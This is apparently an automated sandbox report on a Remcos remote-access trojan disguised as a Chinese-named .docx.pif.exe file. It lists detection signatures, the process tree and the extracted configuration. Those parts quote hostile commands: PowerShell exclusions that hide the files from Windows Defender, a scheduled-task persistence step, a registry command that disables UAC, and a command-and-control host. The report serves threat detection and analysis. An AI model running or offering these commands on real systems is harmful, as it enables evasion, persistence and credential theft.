Edit tour

Windows Analysis Report
#U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Overview

General Information

Sample name:	#U8f6e#U6905-#U89c4#U683c.docx.pif.exe renamed because original name is a hash value
Original sample name:	-.docx.pif.exe
Analysis ID:	1466661
MD5:	a048afa687356f7d1b0fc9375ca13d06
SHA1:	ec3f1158191496c89ce09ccb1dc699278b2a506a
SHA256:	f0ec07e537c7bf74abbc66af82e1f273fceca81467e1d74ed69514107421de61
Tags:	exepif
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Opens the same file many times (likely Sandbox evasion)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

#U8f6e#U6905-#U89c4#U683c.docx.pif.exe (PID: 3628 cmdline: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe" MD5: A048AFA687356F7D1B0FC9375CA13D06)

powershell.exe (PID: 4368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6136 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6600 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 4304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

TkdxROLUOVpK.exe (PID: 2892 cmdline: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe MD5: A048AFA687356F7D1B0FC9375CA13D06)

schtasks.exe (PID: 3292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vbc.exe (PID: 4744 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

vbc.exe (PID: 5456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\gaban\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b0e0:$a1: Remcos restarted by watchdog! 0xe3b00:$a1: Remcos restarted by watchdog! 0x15c140:$a1: Remcos restarted by watchdog! 0x6b658:$a3: %02i:%02i:%02i:%03i 0xe4078:$a3: %02i:%02i:%02i:%03i 0x15c6b8:$a3: %02i:%02i:%02i:%03i
0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x18e468:$a1: Remcos restarted by watchdog! 0x206e88:$a1: Remcos restarted by watchdog! 0x2282a8:$a1: Remcos restarted by watchdog! 0x18e9e0:$a3: %02i:%02i:%02i:%03i 0x207400:$a3: %02i:%02i:%02i:%03i 0x228820:$a3: %02i:%02i:%02i:%03i
Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x73d2d:$a1: Remcos restarted by watchdog! 0x74287:$a3: %02i:%02i:%02i:%03i 0x746b6:$a3: %02i:%02i:%02i:%03i
Process Memory Space: vbc.exe PID: 4304	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: TkdxROLUOVpK.exe PID: 2892	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: TkdxROLUOVpK.exe PID: 2892	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TkdxROLUOVpK.exe PID: 2892	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: TkdxROLUOVpK.exe PID: 2892	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x23921:$a1: Remcos restarted by watchdog! 0x23e7b:$a3: %02i:%02i:%02i:%03i 0x242a1:$a3: %02i:%02i:%02i:%03i
Process Memory Space: vbc.exe PID: 5456	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: vbc.exe PID: 5456	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: vbc.exe PID: 5456	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb7e8:$a1: Remcos restarted by watchdog! 0xbd42:$a3: %02i:%02i:%02i:%03i 0xc171:$a3: %02i:%02i:%02i:%03i
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
15.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.vbc.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
15.2.vbc.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
15.2.vbc.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
15.2.vbc.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.vbc.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.vbc.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
15.2.vbc.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
15.2.vbc.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0xe30e8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0xe3660:$a3: %02i:%02i:%02i:%03i
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdd028:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0xdcfbc:$s1: CoGetObject 0xdcfd0:$s1: CoGetObject 0xdcfec:$s1: CoGetObject 0xe6f78:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0xdcf7c:$s2: Elevation:Administrator!new:
